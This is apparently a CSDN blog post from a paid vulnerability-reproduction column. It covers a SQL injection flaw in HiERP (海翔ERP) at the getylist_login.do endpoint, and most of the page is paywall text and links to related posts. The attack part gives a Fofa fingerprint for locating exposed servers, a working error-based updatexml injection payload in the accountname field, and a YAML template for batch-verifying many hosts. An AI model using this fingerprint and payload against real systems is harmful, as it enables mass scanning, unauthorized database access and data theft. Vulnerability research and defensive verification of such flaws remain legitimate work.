海翔ERP getylist_login.do SQL注入漏洞（含批量验证poc）

今天晚上早睡觉

已于 2024-04-18 10:05:02 修改

阅读量20

点赞数

分类专栏：漏洞复现文章标签： sql 数据库 web安全

于 2024-04-18 10:04:38 首次发布

本文链接：https://blog.csdn.net/weixin_43567873/article/details/137909038

版权

漏洞复现专栏收录该内容

361 篇文章 97 订阅 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

1.简介

海翔(HiERP)是一款企业管理软件，库存模块是其核心模块之一，通过该模块可以管理企业中产品、原材料、半成品等物料的进货、销售和库存等信息.
该产品存在SQL注入漏洞

2.Fofa

body="checkMacWaitingSecond"

3.漏洞复现

POST:/getylist_login.do
accountname=test' and (updatexml(1,concat(0x7e,(select md5(1122)),0x7e),1));--

4.YAML

params: []
name: 海翔ERP getylist_login.do SQL注入漏洞
set: {}
rules: []
groups:
  rules:
  - method: POST
    path: /getylist_login.do
    headers: {}
    body: accountname=test' and (updatexml(1,concat(0x7e,(select md5(1122)),0x7e),1))

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

今天晚上早睡觉

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
海翔ERP getylist_login.do SQL注入漏洞（含批量验证poc）

海翔ERP getylist_login.do SQL注入漏洞（含批量验证poc）
复制链接

扫一扫

专栏目录

订阅专栏

【漏洞复现】云时空社会化商业ERP系统LoginName SQL注入漏洞

晚风不及你

04-24

云时空社会化商业ERP系统loginName存在SQL注入漏洞，攻击者可以通过此漏洞获取数据库敏感信息。

登录页面的SQL注入漏洞

m0_61974571的博客

10-12

3754

1、在Linux准备一套Xampp或者Phpstudy：模拟攻防2、在vscode安装Rremote Development插件，进行远程调试新添加主机在opt/lampp/security创建项目 login.php welcome.php 二、进行登陆的渗透测试注入类攻击的核心点：（1）、拼接为有效的代码或语句（2）、确保完成了闭合，并且可以改变原有执行逻辑通常并非处理一下就可以完成拼接和闭合，需要不停的尝试，知道出现不一样的结果。这个尝试过程建议使用python+字典快速处理上述代码一共存

参与评论您还未登录，请先登录后发表或查看评论

如何用SQL注入攻击登陆界面

热门推荐

Rainman的专栏

06-15

2万+

适用范围： 1. 如果一个系统是通过SELECT * FROM accounts WHERE username=admin and password = password这种显式的SQL来进行登陆校验，也就是执行这个SQL语句，如果数据库中存在用户名为admin, password为password的用户，就登陆成功，否则就登陆失败。2. 系统没有对用户输入进行全面

sql注入学习——使用sql注入进行登录，使用union进行攻击注入

Demonslzh的博客

06-27

4247

1、sql注入环境搭建为了方便对sql注入学习，我们首先搭建一个简单的web页面，数据库使用postgresql，具体页面如下需要这个页面源码的可以去关注页面底部公众号后台回复获取 2、使用sql注入进行登录 数据库的用户信息如下看下登录的一个主要逻辑，登录成功后前端页面显示当前用户所拥有的权限，登录失败则显示permission denied #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ 1) change to directory co

利用SQL注入漏洞登录后台

weixin_33787529的博客

04-17

4414

2019独角兽企业重金招聘Python工程师标准>>> ...

海翔ERP getylist_login.do SQL注入漏洞

qq_39573664的博客

12-25

462

海翔ERP在getylist_login.do接口的accountname存在sql注入漏洞，攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。

伍海翔APP设计·UI设计作品.pdf

08-26

伍海翔APP设计·UI设计作品.pdf

盐城海翔EPRO系统介绍PPT学习教案.pptx

10-04

盐城海翔EPRO系统介绍PPT学习教案.pptx

海翔药业：2021年半年度报告.rar

09-29

海翔药业：2021年半年度报告.rar

海翔药业：首次公开发行股票招股说明书.PDF

05-15

海翔药业：首次公开发行股票招股说明书.PDF

海翔药业：2021年半年度报告.PDF

08-31

海翔药业：2021年半年度报告.PDF

ctf-WEB-login2(sql注入)

god_001的博客

05-12

2432

题目地址：跳转提示打开网址，是一个熟悉的登陆页面，几次登录尝试发现报错回显只有一种应当不是基于布尔的盲注，bp抓包看看：发现响应中有一串奇怪的字符，尝试使用base64解码，得到：这应该是一个提示，需要绕过其判断条件这里就可以利用联合查询来注入（union select) 之前说过，union select后面加数字串时，如果没有后面的表名，则该语句没有向任何一个数据库查询，那么它输出的内容就是select后的数字，并且使用联合查询要求必须保证前后查询的字段数一致，因此要绕

登录测试——SQL注入

Growing_way的博客

11-05

8603

登录页面的安全性测试包含一项：防止SQL注入 什么是SQL注入 SQL Injection：就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。例如：填好正确的用户名(marcofly)和密码(test)后，点击提交，将会返回给我们“欢迎管理员”的界面。 select * from users where username=‘mar...

mysql 登录框注入_CTF| SQL注入之login界面类

weixin_34609222的博客

01-19

2500

SQL注入是CTF的WEB方向必不可少的一种题型，斗哥最近也做了一些在线题目，其中最常见的题目就是给出一个登录界面，让我们绕过限制登录或者一步步注入数据。万能密码—very easy题目入口：http://lab1.xseclab.com/sqli2_3265b4852c13383560327d1c31550b60/index.php题目来源：hacking lab inject 01~源代码有提...

PostgreSQL的视图pg_class

lee_vincent1的博客

06-02

1086

在 PostgreSQL 中，pg_class是一个系统目录表，用于存储所有关系（如表、索引、视图、序列等）的元数据。pg_class是数据库系统的重要组成部分，包含了关于每个关系的具体信息。pg_class。

sql server:数据库处于单用户模式，当前某个用户已与其连接

weixin_42874924的博客

05-30

543

sql server:数据库处于单用户模式，当前某个用户已与其连接

基础—SQL—DQL（数据查询语言）聚合函数

m0_74363339的博客

05-30

609

这篇博客主要讲到了SQL分类中的DQL（数据查询语言）—聚合函数的讲解，聚合函数比较简单，但它主要配合着分组查询进行数据查询的操作，注意NULL的字段值不参与聚合函数的运算......

SQL刷题笔记day8——SQL进阶——表与索引操作

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交